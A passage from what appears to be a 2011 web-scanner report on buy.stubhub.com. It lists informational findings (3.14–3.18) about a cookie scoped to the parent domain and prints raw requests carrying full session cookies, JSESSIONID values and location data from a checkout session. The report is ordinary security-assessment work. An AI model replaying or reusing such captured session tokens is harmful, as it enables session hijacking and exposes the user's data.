User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDDB7AA39C110393178904AB7E84BF7; Path=/; Domain=.stubhub.com


3.14. https://buy.stubhub.com/promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/JS/myaccount-beta-perf-url-scraping-content-1.0.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 16 Sep 2010 00:19:32 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDFB4A639C110397CCC904C887D2E22; Path=/; Domain=.stubhub.com


3.15. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-analytics-bottom-e9f04.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 26 Jan 2011 22:59:58 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE212D239C1103934CA8D4B3446FCC6; Path=/; Domain=.stubhub.com


3.16. https://buy.stubhub.com/promotions/scratch/foresee/foresee-analytics-top-e9f04.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-analytics-top-e9f04.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-analytics-top-e9f04.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 18 Nov 2010 21:49:07 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE1D53839C1103976C8ACBDDDE7ECCC; Path=/; Domain=.stubhub.com


3.17. https://buy.stubhub.com/promotions/scratch/foresee/foresee-trigger.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/foresee/foresee-trigger.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/foresee/foresee-trigger.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 17 Nov 2010 22:28:59 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1599
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF138F2E39C1103958ACC35B4524558D; Path=/; Domain=.stubhub.com


3.18. https://buy.stubhub.com/promotions/scratch/lt/www-2.0.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/lt/www-2.0.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/lt/www-2.0.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Wed, 02 Feb 2011 23:54:38 GMT
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
